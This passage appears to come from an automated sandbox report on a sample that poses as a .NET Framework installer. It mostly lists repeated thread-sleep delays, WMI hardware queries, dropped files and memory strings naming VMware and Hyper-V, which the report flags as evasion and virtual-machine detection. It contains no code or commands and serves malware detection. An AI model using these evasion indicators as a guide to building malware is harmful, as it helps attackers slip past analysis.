                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -597046s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -596937s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -596828s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -596718s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -596609s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -596500s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -596390s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -596278s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -596171s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -596062s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -595952s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -595840s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -595704s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -595562s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -595453s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -595323s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -595218s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -595100s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -594984s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -594875s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -594575s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -594468s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -594359s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -594249s >= -30000sJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_2-16680
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\splwow64.exeLast function: Thread delayed
                          Source: C:\Windows\splwow64.exeLast function: Thread delayed
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-15672
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599843Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599713Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599604Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599495Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599390Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599280Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599159Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599031Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598921Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598796Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598687Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598577Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598468Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598359Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598250Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598140Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598030Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597921Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597812Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597703Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597593Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597480Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597375Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597265Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597156Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597046Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596937Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596828Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596718Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596609Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596500Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596390Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596278Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596171Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596062Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595952Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595840Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595704Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595562Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595453Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595323Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595218Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595100Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594984Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594875Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594575Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594468Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594359Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594249Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWindow / User API: threadDelayed 3036Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWindow / User API: threadDelayed 6813Jump to behavior
                          Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1865
                          Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 8071
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-76546
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\3082\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1042\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1043\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1044\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1041\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1040\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\3076\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1035\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1036\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1038\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1037\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1031\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1033\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1032\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1028\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1055\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1030\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1029\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1053\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\2070\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1025\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\2052\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\SetupUtility.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1046\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1045\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1049\SetupResources.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599843Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599713Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599604Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599495Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599390Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599280Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599159Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 599031Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598921Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598796Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598687Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598577Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598468Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598359Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598250Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598140Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 598030Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597921Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597812Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597703Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597593Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597480Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597375Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597265Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597156Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 597046Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596937Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596828Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596718Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596609Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596500Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596390Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596278Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596171Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596062Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595952Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595840Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595704Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595562Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595453Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595323Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595218Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595100Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594984Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594875Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594575Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594468Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594359Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594249Jump to behavior
                          Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                          Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0021774A
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeAPI call chain: ExitProcess graph end nodegraph_4-76742
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeAPI call chain: ExitProcess graph end nodegraph_4-75963
                          Source: EQB4OREJ.exe.0.drBinary or memory string: VMware
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Hypervisor Logical Processor
                          Source: EQB4OREJ.exe, 00000003.00000002.975473713.000000001B7F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time48
                          Source: EQB4OREJ.exe, 00000003.00000002.970207921.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
                          Source: EQB4OREJ.exe, 00000003.00000002.976004726.000000001B87F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
                          Source: EQB4OREJ.exe, 00000003.00000002.976371340.000000001C498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Virtual Machine Bus Pipes
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Hyper-V Dynamic Memory Integration Service
                          Source: EQB4OREJ.exe, 00000003.00000002.975473713.000000001B7F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
                          Source: EQB4OREJ.exe, 00000003.00000002.976216429.000000001BF65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ries9610Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytesgg8
                          Source: EQB4OREJ.exe, 00000003.00000002.970207921.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.803257164.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe.0.drBinary or memory string: Hyper-V Video
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )Hyper-V Hypervisor Root Virtual Processor
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
                          Source: EQB4OREJ.exe, 00000003.00000002.976371340.000000001C498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware7MUBNG6CWin32_VideoControllerTR8H7FY_VideoController120060621000000.000000-000698595.1display.infMSBDA9BZP6XNCPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemuser-PC1280 x 1024 x 4294967296 colors5V9DYM_Xt32K
                          Source: EQB4OREJ.exe, 00000003.00000002.976371340.000000001C498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
